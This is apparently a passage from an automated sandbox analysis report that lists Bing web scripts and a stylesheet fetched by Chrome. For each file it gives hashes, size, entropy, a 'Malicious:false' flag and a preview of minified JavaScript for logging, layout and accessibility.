                                                                            SSDEEP:384:3Wsj/9Npzk8fbw3QMXmwOAahGvyBJeXiOOF240eApyfYRxW+:3z/PpzkLXmw0onXi9F24Ypw43
                                                                            MD5:5704A84AC0573BDBF11A8DA6582410C6
                                                                            SHA1:7FE63892DFBB4AE078F5B784A31B29E981E22523
                                                                            SHA-256:525FA9E3B57ABEE5ED411C5EBA2F74DFF25D2591BBC142A976DE1604E2502D9E
                                                                            SHA-512:4DF7C5152CC7A9BE28A650A3C275B9F9880139D640268E3266968EB585F813E6178FEE193D8348B5DA386A3893E54FD40A3B6149275DB404D3511F27532D8170
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var customEvents,__spreadArray,fallbackReplay,EventLoggingModule;_w.EventsToDuplicate=[];_w.useSharedLocalStorage=!1;define("shared",["require","exports"],function(n,t){function s(n,t){for(var r=n.length,i=0;i<r;i++)t(n[i])}function r(n){for(var i=[],t=1;t<arguments.length;t++)i[t-1]=arguments[t];return function(){n.apply(null,i)}}function u(n){i&&event&&(event.returnValue=!1);n&&typeof n.preventDefault=="function"&&n.preventDefault()}function f(n){i&&event&&(event.cancelBubble=!0);n&&typeof n.stopPropagation=="function"&&n.stopPropagation()}function e(n,t,i){for(var r=0;n&&n.offsetParent&&n!=(i||document.body);)r+=n["offset"+t],n=n.offsetParent;return r}function o(){return(new Date).getTime()}function h(n){return i?event:n}function c(n){return i?event?event.srcElement:null:n.target}function l(n){return i?event?event.fromElement:null:n.relatedTarget}function a(n){return i?event?event.toElement:null:n.relatedTarget}function v(n,t,i){while(n&&n!=(i||document.body)){if(n==t)return!0;n=n.p
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (2850), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2850
                                                                            Entropy (8bit):5.351984550886732
                                                                            Encrypted:false
                                                                            SSDEEP:48:bfYHC/SmmnTLJAeobSrKXNaG1WaQ5HYXCMsVESuTA1IIfMxWe:M/nTLye1rKdBbQZYhiCTYpfpe
                                                                            MD5:802CE043AFF696F60C1AD84C359C24AE
                                                                            SHA1:9E31964C156864CF7AD2423A53FB43DD32609573
                                                                            SHA-256:9062C70FA349E6E953BC7833436FABC098D2371C74627D1BF6565D18A8457781
                                                                            SHA-512:18919B8259C0289B392B463235F886137F6FC460A403932F197830E9D8B55D0B18B337CB97033EF5E54B66FF7AD729001A980E94F5806711CB8515020EBB17F3
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:function getBrowserWidth_Desk(){var t=_d.documentElement,n=Math.round(_w.innerWidth||t.clientWidth);return n<100&&(n=1496),n}function getBrowserHeight_Desk(){var t=_d.documentElement,n=Math.round(_w.innerHeight||t.clientHeight);return n<100&&(n=796),n}function getBrowserScrollWidth_Desk(){var n=Math.round(_d.body.clientWidth);return n<100&&(n=1496),n}function getBrowserScrollHeight_Desk(){var n=Math.round(_d.body.clientHeight);return n<100&&(n=796),n}(function(){function st(n,t){var i="XW",r;n<=it&&(i="W");n<=rt&&(i="M");n<=ut&&(i="N");n<=ft&&(i="S");n<=et&&(i="HTP");n<=ot&&(i="NOTP");r="T";t<=g&&(r="M");t<=nt&&(r="S");c(tt,i,"width",n.toString());c(d,r,"height",t.toString())}function c(r,u,f,e){l("Info",r,u,f,e);t(n,r)!=u&&i(n,r,u,!0,"/",null)}function l(n,t,i,r,u){typeof Log!="undefined"&&Log.Log&&Log.Log(n,t,i,!1,r,u)}function f(n,t,i){typeof Log!="undefined"&&Log.Log&&Log.Log(n,t,i)}function r(r,u,e){var o=t(n,u);o&&o===r||(i(n,u,r,!0,"/",null),o&&e&&f("Info","BRResize",e))}functio
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (674), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):674
                                                                            Entropy (8bit):5.210197710226456
                                                                            Encrypted:false
                                                                            SSDEEP:12:NYRUeSpDeuB0UzQSp/CSpsDZmDdFly/r7bOOy/k3z7oOX8j1L1z8MmTfMM:iRbpuB5zQuCnsa7bOOlj7oOX4l1z8Mmx
                                                                            MD5:5A1A81312BF61E94FC97DB3A171C2240
                                                                            SHA1:5B16C57ADE22CC6948296B564D0E9B3FA7C81A49
                                                                            SHA-256:3E371F38691430D58C417A3CCB0C9FB4F9F7ED8E92321C42D2CF6B680FB349F9
                                                                            SHA-512:75BD3BAC62BDD1105E460BD89A1372BC3F0BF47DA4C7B49E758CB175D9A52BD77090DED7AF2CE0E6E804E292495FFA44D004E1C6862F39EACC44F1FD488AF5E7
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/WxbFet4izGlIKWtWTQ6bP6fIGkk.js
                                                                            Preview:var LogAccessibilityEvents;(function(){function t(){var t=1;t=navigator&&navigator.userAgent.match(/Edge/)&&_w.screen?screen.deviceXDPI/screen.systemXDPI:navigator&&(navigator.userAgent.match(/Firefox/ig)||navigator.userAgent.match(/Trident/))?_w.devicePixelRatio:_w.outerWidth/_w.innerWidth;t>=4&&_w.devicePixelRatio>=4?(n=!0,Log.Log("Info","Accessibility","acczoommob"),Log.LogFilterFlare&&Log.LogFilterFlare(["acczoommob"])):n&&(Log.Log("Info","Accessibility","acczoompc"),Log.LogFilterFlare&&Log.LogFilterFlare(["acczoompc"]),n=!1)}var n=!1;typeof Log!="undefined"&&Log.Log&&(t(),sj_be(_w,"resize",function(){t()}))})(LogAccessibilityEvents||(LogAccessibilityEvents={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):272
                                                                            Entropy (8bit):5.048105561416113
                                                                            Encrypted:false
                                                                            SSDEEP:6:2LGXTMD6REydKENouDlKqWfUyoI6/j9/BlSkpxs+lZUMYIXM6rIriT:2QqgG0oG3WfU9Iij9/rq+dXMN2T
                                                                            MD5:05E94F00F716C13C6D71E3DDBAAD0731
                                                                            SHA1:C3322A4BF0E23E719E483B6271BCD5A85C484870
                                                                            SHA-256:8FAA33F01D5CFC08518C2CB9FE1386C2EE50F53B7FF456E54038FB702BA8DCAB
                                                                            SHA-512:BD93FFF213B526B76354C059701805FC89FD222757D7F03929BF0FEC5530BD3BBF88CDFEB96B24C32A8C2850319DA9E76CF731E93CF37DE2B6FD3E80980B16F7
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:(function(){function i(){var t=_ge("b_header");t&&(t.className=t.classList.contains("b_2ndscope")?"b_focus b_2ndscope":"b_focus");n&&(typeof Log!="undefined"&&Log&&Log.Log&&Log.Log("SpSbInteract","AS","PerfInst",!1),n=!1)}var t=_ge("sb_form_q"),n=!0;sj_be(t,"focus",i)})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):289
                                                                            Entropy (8bit):4.88926455834166
                                                                            Encrypted:false
                                                                            SSDEEP:6:2LGXO86zKFddXQOa65Em/L6I38TcqLcUCPrWqpOlZXzPlg3X6:2QO8vzdXmMPTiAiXzC3X6
                                                                            MD5:9085E17B6172D9FC7B7373762C3D6E74
                                                                            SHA1:DAB3CA26EC7A8426F034113AFA2123EDFAA32A76
                                                                            SHA-256:586D8F94486A8116AF00C80A255CBA96C5D994C5864E47DEAC5A7F1AE1E24B0D
                                                                            SHA-512:B27B776CB4947EEF6D9E2A33B46E87796A6D4C427F4759C08CF5AA0EE410A5F12E89CA6AB9CDDD86C8471037E3C505F43C8B7FC6D8417F97F9FE3C5C47216BC4
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/2rPKJux6hCbwNBE6-iEj7fqjKnY.js
                                                                            Preview:(function(){if("BroadcastChannel"in window){var t=1,n=new BroadcastChannel("tabCountBroadCastChannel");n.onmessage=function(i){i.data=="newTab"&&n.postMessage("existingTab");i.data=="existingTab"&&t++};n.postMessage("newTab");sb_st(function(){Log.Log("Tab","count",t.toString())},200)}})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):128
                                                                            Entropy (8bit):4.784478509770579
                                                                            Encrypted:false
                                                                            SSDEEP:3:2LGfgKouvFf6on6ASbEmez5MNLfu1xo1ZRFfPFjMci9fBzqM:2LGIKp56bASgz5MNLW1u1ZXPFwci9dqM
                                                                            MD5:08F7C1DC1AAF048802ADC436D9D542BF
                                                                            SHA1:C92D616F5DA1E5C3CC42C5ED4C74E57592779FFB
                                                                            SHA-256:4B2BFE5490E08692E57A12ADA60C818B163C800E17C7C2B91F79FF6D530F5F60
                                                                            SHA-512:CE968BFA7ADA540F2A49123830E55197CADDCAE083CA2363581508B815DDB3B5594F642D455D0002E29A2BC4017F496D8D174A142692CF18E0F6D20B1A836B25
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/yS1hb12h5cPMQsXtTHTldZJ3n_s.js
                                                                            Preview:(function(n,t){onload=function(){_G.BPT=new Date;n&&n();!_w.sb_ppCPL&&t&&sb_st(function(){t(new Date)},0)}})(_w.onload,_w.si_PP)
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (2687), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):2687
                                                                            Entropy (8bit):5.103880568558176
                                                                            Encrypted:false
                                                                            SSDEEP:48:itt+rzsj4+/X7/Xxj/Xk/XJTGdS4bkRb4svSm/KbjxR0+DFZf4uAN4siQFk+oFQq:itwrgcuXDXpXcXJskRblaminxR0yIjl8
                                                                            MD5:A5C8347D508377BFE32F8552CAE03433
                                                                            SHA1:262E55E266AFE8FA8CD2A3E5E99BB1B80128C1D5
                                                                            SHA-256:AA03263ED1863A42418D316869FBBC0BC1FAAD3A1983B444EE73ED6636779B7F
                                                                            SHA-512:93B6731E9410EBD804DAE3AD0BB400887517AAB2B93CEF8B0927B331280979D9AE14B0CA42D6A860C6468E5B54295D7E298BA768139DB3E280D4B922681B0065
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/Ji5V4mav6PqM0qPl6ZuxuAEowdU.js
                                                                            Preview:var AccessibilityHelper;(function(n){function f(n,t,i){n&&n.classList&&t&&(i?n.classList.remove(t):n.classList.add(t))}function lt(n){if(n.keyCode===9)f(this,c,!0);else if(n.keyCode===13)if(this.click)this.click();else{var t=_d.createEvent("MouseEvents");t.initEvent(kt,!0,!0);this.dispatchEvent(t,!0)}}function at(){f(this,c)}function w(n){sj_pd(n);sj_sp(n)}function dt(n){var t;if(n){var r=n.querySelectorAll('a:not([disabled]):not([tabindex="-1"]), button:not([disabled]):not([tabindex="-1"]), input[type=text]:not([disabled]):not([tabindex="-1"]), [tabindex]:not([disabled]):not([tabindex="-1"])'),u=r.length,f=!1,i=null;for(t=0;t<u;t++)if(i=r[t],i.offsetWidth>0){if(ct===i){f=!0;break}i.focus();break}if(f)for(t=u-1;t>=0;t--)if(i=r[t],i.offsetWidth>0){i.focus();break}}}function b(n){var t=n.target||n.srcElement,r,u,i,f;if(t){for(r=_d.querySelectorAll(".accDialog"),u=null,i=0;i<r.length;i++)if(f=r[i],f.contains(t)){u=f;ct=t;break}e&&e.offsetWidth>0&&!e.contains(t)?(w(n),dt(e)):e=u}}function
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):44
                                                                            Entropy (8bit):4.299896391167891
                                                                            Encrypted:false
                                                                            SSDEEP:3:Rx6sLWr5iGNk0RHYWRaY:RpKXxhjh
                                                                            MD5:71C2B5240CDB4B1001CED162819ECA33
                                                                            SHA1:231B0AB741B41D85AA061E56AD51B06A610C452F
                                                                            SHA-256:A220299F29BE127116C8466D6306676F10E9E4200AAED3646547F9AA53501226
                                                                            SHA-512:C2E2BCC607A802AD740707620C84D7240A7639EFD15CA01A0012FFEF61ABA5A723B1AEE0B93B426D6F0DB7B975421032F99EEA2F823B88E99A2D40DB4C50BAC8
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:new wpc_Inst(_w.sched,_ge("b_context"),"TP")
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (559), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):559
                                                                            Entropy (8bit):5.161037890677564
                                                                            Encrypted:false
                                                                            SSDEEP:12:hN404b2CZppR0uujuRWBMLvguNzmxgIbPp0wH9MIBmBZNXIZyk4n:hIZpn3RWBMDgupxI5fBmBZNXIZybn
                                                                            MD5:E8A5707D6AE6DD7E93EA8C3A23DBA987
                                                                            SHA1:A71CDF8C52235930D08A4874039693FDC82E6327
                                                                            SHA-256:543F13A90187BEB6441890F93979F00B8EFAC566716C71D465EE731BA21B7D26
                                                                            SHA-512:79FD0EA1CF0B0CA67AC7EEC0CB6EA684D6CCB6243957ADDA88D95FC3A21997B7A07A0156D87447DA3C5165C198388404F72D9D41CB335955071E4692C332A0BB
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var sj_appHTML=function(n,t){var f,e,o,r,i,s,h;if(t&&n){var c="innerHTML",l="script",a="appendChild",v="length",y="src",p=sj_ce,u=p("div");if(u[c]="<br>"+t,f=u.childNodes,u.removeChild(f[0]),e=u.getElementsByTagName(l),e)for(o=0;o<e[v];o++)r=p(l),i=e[o],i&&(r.type=i.type=="module"||i.type=="importmap"?i.type:"text/javascript",s=i.getAttribute(y),s?(r.setAttribute(y,s),r.setAttribute("crossorigin","anonymous")):(r.text=i[c],r.setAttribute("data-bing-script","1")),i.parentNode.replaceChild(r,i));for(h=_d.createDocumentFragment();f[v];)h[a](f[0]);n[a](h)}}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1508), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1508
                                                                            Entropy (8bit):5.225246371387329
                                                                            Encrypted:false
                                                                            SSDEEP:24:rVnoyfEzPoXeqz23l2T6hBTfBH50t0LqrNn4IjMgnVXaFgf4PdIrryv6p53PQtE7:rVnoyJen3YT+BzBHmiLYNn5XMgf8jv6t
                                                                            MD5:60E4AA30EF7EEAF5FAABB4D13BBD7F0A
                                                                            SHA1:4F861C616B0D90C28CE0E8495A453F73F4D0F2BB
                                                                            SHA-256:796EB10FDEACBEC23196544F9F66B423262923EF7B6F79977E9A157DB3D24AAC
                                                                            SHA-512:11BF27E4426BF5B7D97CEDDE31D1E775B5158A1E950006718EBACF0E1E874FB3284C79ECC59D4C2B7EED2E35C54695B4197A855834D0331F8FEFBD603DD8E480
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var __spreadArray=this&&this.__spreadArray||function(n,t,i){if(i||arguments.length===2)for(var r=0,f=t.length,u;r<f;r++)!u&&r in t||(u||(u=Array.prototype.slice.call(t,0,r)),u[r]=t[r]);return n.concat(u||Array.prototype.slice.call(t))},SHwlochelper;(function(n){function e(n,t,i,u,f){r(n.coords.latitude,n.coords.longitude,n.coords.accuracy,t,i,u,f)}function r(t,r,u,e,o,s,h){var c=n.sF(f,t,r,u);c+="&sid="+e;i(c,n.logEventTypeDev,"DeviceLocation",o,s,h)}function o(t,r,f,e){var o=u+"&sid="+t;i(o,n.logEventTypeDev,"Block",r,f,e)}function i(n,i,r,u,f,e){n+="&clientsid="+_G.SID;var o=sj_gx();o.open("GET",n,!0);t(i,u,"try"+r);o.onreadystatechange=function(){var n,s;o.readyState===4&&(o.status===200?(o.responseText&&(s=(n=_ge("PromptDetails"))!==null&&n!==void 0?n:_d.body,s&&(sj_appHTML(s,o.responseText),_w.rms&&_w.rms.start())),t(i,u,r+"Success"),typeof f=="function"&&f()):(t(i,u,r+"Failure"),typeof e=="function"&&e()))};o.send()}function t(n,t,i){for(var u=[],r=3;r<arguments.length;r++)u[r-3]
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):75
                                                                            Entropy (8bit):4.546752318250266
                                                                            Encrypted:false
                                                                            SSDEEP:3:qTKe2LkTL4hgB5hKZZNlO2hKYt:qulLmLCg2ZJOTG
                                                                            MD5:505C1B97B12647FAD0E3392277FD7CB7
                                                                            SHA1:8EC44FB4A2F04BF2DFDAD616397EF84059094DDD
                                                                            SHA-256:A2246C34F2A1064973C523BA3C09E21DEB16CE351E3C26FFACA4FFBCA47867CC
                                                                            SHA-512:08715BDCDD35D8A3A4B07D584D00BD7861E41B87228707AF38B32AB5D6002FEC90C5004083935798D4ADDEE473316021E4BA9685977E047B7914E68722FF4E8E
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var QuickSearch;(function(n){n.isCursor=!0})(QuickSearch||(QuickSearch={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (2667), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2667
                                                                            Entropy (8bit):5.1731531628165826
                                                                            Encrypted:false
                                                                            SSDEEP:48:z9NqvTeIMIXiRxiIQ8gldgj0AEd8KjVi/dpu/cHoRmA9lkhWDoM:BNqymiRxiIQ3lis8eY1gcHKCi
                                                                            MD5:BDCA3999DD520E44CDD8723D0332AF3A
                                                                            SHA1:8D1A4F6FDC80F4F88BD2AAE4127602855CA9EFC2
                                                                            SHA-256:AB9C7F5BC90579A6876E4DD42C96343DDE656E31D7EFB87B34565295BA146D3A
                                                                            SHA-512:50F5205828410D65C38C6A255CAEB87A60EF879E60CABD970B3FBB65333EA1C3586D2AD1232BD886FAE1272B07A9335A83D7D2190B42EAC58DDDB13CDC25898A
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var ClickBackUtility;(function(n){function e(){var n="sschk",t="sschv",i;try{if(typeof Storage=="undefined"||typeof sessionStorage=="undefined"||(sessionStorage.setItem(n,t),i=sessionStorage.getItem(n),sessionStorage.removeItem(n),i!=t))return!1}catch(r){return!1}return!0}function o(){var t,n,i,r;return!!(((t=_w===null||_w===void 0?void 0:_w.performance)===null||t===void 0?void 0:t.navigation)||((r=(i=(n=_w===null||_w===void 0?void 0:_w.performance)===null||n===void 0?void 0:n.getEntriesByType)===null||i===void 0?void 0:i.call(n,"navigation"))===null||r===void 0?void 0:r.length)>0)}function s(){var n,t,i,r,u;return"performance"in _w&&(((r=(i=(t=(n=_w.performance)===null||n===void 0?void 0:n.getEntriesByType)===null||t===void 0?void 0:t.call(n,"navigation"))===null||i===void 0?void 0:i[0])===null||r===void 0?void 0:r.type)==="back_forward"||((u=_w.performance.navigation)===null||u===void 0?void 0:u.type)&&_w.performance.navigation.type===_w.performance.navigation.TYPE_BACK_FORWARD)}func
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (19674), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):19674
                                                                            Entropy (8bit):5.33240026231163
                                                                            Encrypted:false
                                                                            SSDEEP:384:3Wsj/9Npzk8fbw3QMXmwOAahGvyBJeXiOOF240eApyfYRxW+:3z/PpzkLXmw0onXi9F24Ypw43
                                                                            MD5:5704A84AC0573BDBF11A8DA6582410C6
                                                                            SHA1:7FE63892DFBB4AE078F5B784A31B29E981E22523
                                                                            SHA-256:525FA9E3B57ABEE5ED411C5EBA2F74DFF25D2591BBC142A976DE1604E2502D9E
                                                                            SHA-512:4DF7C5152CC7A9BE28A650A3C275B9F9880139D640268E3266968EB585F813E6178FEE193D8348B5DA386A3893E54FD40A3B6149275DB404D3511F27532D8170
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://www.bing.com/rp/f-Y4kt-7SuB49beEoxsp6YHiJSM.js
                                                                            Preview:var customEvents,__spreadArray,fallbackReplay,EventLoggingModule;_w.EventsToDuplicate=[];_w.useSharedLocalStorage=!1;define("shared",["require","exports"],function(n,t){function s(n,t){for(var r=n.length,i=0;i<r;i++)t(n[i])}function r(n){for(var i=[],t=1;t<arguments.length;t++)i[t-1]=arguments[t];return function(){n.apply(null,i)}}function u(n){i&&event&&(event.returnValue=!1);n&&typeof n.preventDefault=="function"&&n.preventDefault()}function f(n){i&&event&&(event.cancelBubble=!0);n&&typeof n.stopPropagation=="function"&&n.stopPropagation()}function e(n,t,i){for(var r=0;n&&n.offsetParent&&n!=(i||document.body);)r+=n["offset"+t],n=n.offsetParent;return r}function o(){return(new Date).getTime()}function h(n){return i?event:n}function c(n){return i?event?event.srcElement:null:n.target}function l(n){return i?event?event.fromElement:null:n.relatedTarget}function a(n){return i?event?event.toElement:null:n.relatedTarget}function v(n,t,i){while(n&&n!=(i||document.body)){if(n==t)return!0;n=n.p
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):42
                                                                            Entropy (8bit):4.159592720140253
                                                                            Encrypted:false
                                                                            SSDEEP:3:JWlKSADCJs:JWM5f
                                                                            MD5:6EAC5DD9AD8079C5DFC028D43A3A03D6
                                                                            SHA1:AA342229EBA82142CD83DFA65E997466EAD0C06C
                                                                            SHA-256:166C8602D28E6DC77021EB499E03263B34ED0BB31C40601C77F7F0B5335E9046
                                                                            SHA-512:9AF3146B286D17A784AB59D079EA6729DD6A0926E7F57C6CA282DBFE1EADBCC4BB08E24EAD88795D26447BF4E242DC8C5BDA57403759273319F05207D72594EB
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/qjQiKeuoIULNg9-mXpl0ZurQwGw.css
                                                                            Preview:#b_header #id_h{content-visibility:hidden}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (740), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):740
                                                                            Entropy (8bit):5.111935511678866
                                                                            Encrypted:false
                                                                            SSDEEP:12:Nc0u45yskXrK/d++nH1DRRYXJXtHuzxN/heVl4vc5HuQZKXtrRORT5vvt:K0uYyskXrK/lHlRRUXJoN/heEUHHKtru
                                                                            MD5:B08FF6B34D04C1B75E692DBC2ECA0AD9
                                                                            SHA1:694AC5AC1D2DB59DD7180BE36B62810BB8C8FF18
                                                                            SHA-256:C21CCE393B83CFAB856AAC292458407ED1B0DB51364ED7A523806DAC972B291F
                                                                            SHA-512:61E0D2F5BFE5EDAC42439A139CFCA99BD63A2FED7235FF9238AE79BF9B0C068855A0741E181048B4040EEC1B2F0F448734100A198AF614223E1A3CA0C648E924
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var LoadThirdPartyIframe;(function(n){function r(){e();var n=document.createElement("iframe");n.id=i;n.style.display="none";n.src="".concat(t,"/instrument/cookieenabled");document.body.appendChild(n)}function u(){var n=document.getElementById(i);n&&n.parentNode&&n.parentNode.removeChild(n)}function f(n){n&&n.origin===t&&Log&&Log.Log&&(Log.Log("ClientInst","CookieInstrumentation","Thirdparty",!1,"IsEnabled",n.data),u())}function e(){var n=sb_gt(),t;n&&(t=Math.floor(n/1e3)*1e3,sj_cook.set("SRCHUSR","TPC",t.toString(),!0,"/"))}function o(){window.addEventListener("message",function(n){return f(n)})}function s(){o();r()}var t="https://3pcookiecheck.azureedge.net",i="3piframe";n.load=s})(LoadThirdPartyIframe||(LoadThirdPartyIframe={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (912), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):912
                                                                            Entropy (8bit):5.121926145543368
                                                                            Encrypted:false
                                                                            SSDEEP:12:5GKI+kvKDiq2W8Q6wWkAvADWcEjMZgOj1Ly/Exq3ADWcEffbcj1Ly/JoC0f9xglB:5qnvk2ABAsFlSE9leEFLBc
                                                                            MD5:6E7EC123684ACED736E80EEAB4B5C7A2
                                                                            SHA1:FDF75B57EB954B5648D48BAE1D93DEC8B0B319B2
                                                                            SHA-256:1D40A030B13F26D2698D1807ADD59CF75332D5D2A7045FE3EB26891823B28A48
                                                                            SHA-512:E401996DBB61056A6F1B8F6A65B389D72197A5A3466E4CE14C25AF5DE2A9848633EE81661F84E9EC98D263665C057EA2A48FD103580BF7CB233F1A0B3425840E
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/_fdbV-uVS1ZI1IuuHZPeyLCzGbI.js
                                                                            Preview:var TextSpacing;(function(n){function f(n){if(typeof sj_ce!="undefined"&&u&&t&&r&&(window.MutationObserver||window.WebKitMutationObserver)&&typeof MutationObserver=="function"){var i=new MutationObserver(function(){var i=_qs("header nav ul li a");if(i&&window.getComputedStyle(i).getPropertyValue("letter-spacing")!="normal"&&!t.classList.contains("b_tsp"))t.classList.add("b_tsp"),e(n),typeof Log!="undefined"&&Log.Log("Info","Accessibility","TextSpacing");else if(i&&window.getComputedStyle(i).getPropertyValue("letter-spacing")=="normal"&&t.classList.contains("b_tsp"))t.classList.remove("b_tsp"),typeof Log!="undefined"&&Log.Log("Info","Accessibility","NoTextSpacing");else return});i.observe(r,{subtree:!0,childList:!0})}}function e(n){var t=sj_ce("link");i||(t.rel="stylesheet",t.href=n,u.appendChild(t),i=!0)}var i=!1,r=_qs("html"),u=document.head,t=document.body;n.init=f})(TextSpacing||(TextSpacing={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (357), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):357
                                                                            Entropy (8bit):5.100320804030099
                                                                            Encrypted:false
                                                                            SSDEEP:6:2LGXTMkCDpk6CSVKvxpKv8Ed7fxu7hJRJeGMYS+ePekKfT32PV9m+8mq1mqJFO:2QVlY8EbgRUGhS+eTKb2PVESq8qrO
                                                                            MD5:2DF9793CF020A37C88178BE84311427A
                                                                            SHA1:29CFE86239722D4F4AF07C494D676092896A8600
                                                                            SHA-256:A69D257EEE41E843881D548D2E4EE5A0727B889AB22BFFDAA8ED1074E802BCC6
                                                                            SHA-512:E9A35EC1E466FEB3E273FB991A3282BA1C45FD0EACEA956E9821914CC4261377684B062BDE888EBF5767BBC055DB191DC14E00AF8037B5607449C06E5D2DD082
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:(function(){function r(n){if(n&&(i=0),!(i>60)){i++;var u=_w.CursorProgress||_w.CursorProgressFull;u&&u.bind();t&&sb_ct(t);t=sb_st(r,1e3)}}function n(){r(!0)}var t=null,i=0;n();typeof sj_be!="undefined"&&sj_be(_w,"load",n);typeof sj_evt!="undefined"&&(sj_evt.bind("onP1",n),sj_evt.bind("onP1Lazy",n),sj_evt.bind("ajaxReady",n),sj_evt.bind("ajax.load",n))})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (21932)
                                                                            Category:downloaded
                                                                            Size (bytes):21963
                                                                            Entropy (8bit):5.358200717387569
                                                                            Encrypted:false
                                                                            SSDEEP:384:Km4kT1lYxfqyDOhKMpWMEVhbTDDoFWZ3BnqIfP5IDV6s4RKAwKXvUNuw+0wzueAi:35Tifh3bBpBnqIH+Z6sepXv0uQaV
                                                                            MD5:974B999F9F10DCF784EE257E2AA2F953
                                                                            SHA1:EAEF03A5BA6C5C15B373AB5916168CDE71A29572
                                                                            SHA-256:5A0F2478D335D70CD2510F8EF00BFC0CA2057B787302771EBD411970F1C0ED44
                                                                            SHA-512:CAACB5F8DC1CA7210B151E75DD5054650F70C63C49C6D27A77FF851B24279FDBF7FDF35174EA44F0A0104C909BE3000A40CD5DF45CE5F4163537997969737852
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/6u8DpbpsXBWzc6tZFhaM3nGilXI.js
                                                                            Preview:/*!DisableJavascriptProfiler*/.var BM=BM||{};BM.config={B:{timeout:250,delay:750,maxUrlLength:300,sendlimit:20,maxPayloadSize:7e3},V:{distance:20},N:{maxUrlLength:300},E:{buffer:30,timeout:5e3,maxUrlLength:300},C:{distance:50},BD:{basic:1}},function(n){function vt(){if(!document.querySelector||!document.querySelectorAll){k({FN:"init",S:"QuerySelector"});return}w={};e=[];ft=1;ut=0;rt=0;o=[];s=0;h=!1;var n=Math.floor(Math.random()*1e4).toString(36);t={P:{C:0,N:0,I:n,S:ei,M:r,T:0,K:r,F:0}};pi()}function oi(n,t){var r={};for(var i in n)i.indexOf("_")!==0&&(i in t&&(n[i]!==t[i]||i==="i")?(r[i]=t[i],n[i]=t[i]):r[i]=null);return r}function si(n){var i={};for(var t in n)n.hasOwnProperty(t)&&(i[t]=n[t]);return i}function b(n,t,r,u){if(!h){k({FN:"snapshot",S:n});return}r=r||ni;t=t||!1;var f=g()+r;ot(o,n)===-1&&o.push(n);t?(yt(),pt(t,u)):f>s&&(yt(),rt=sb_st(pt,r),s=f)}function k(n){var u={T:"CI.BoxModelError",FID:"CI",Name:ht,SV:ct,P:t&&"P"in t?d(t.P):r,TS:f(),ST:v},i,e;for(i in n)u[i]=n[i];e=d(u
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):6
                                                                            Entropy (8bit):2.584962500721156
                                                                            Encrypted:false
                                                                            SSDEEP:3:jUYn:jBn
                                                                            MD5:77373397A17BD1987DFCA2E68D022ECF
                                                                            SHA1:1294758879506EFF3A54AAC8D2B59DF17B831978
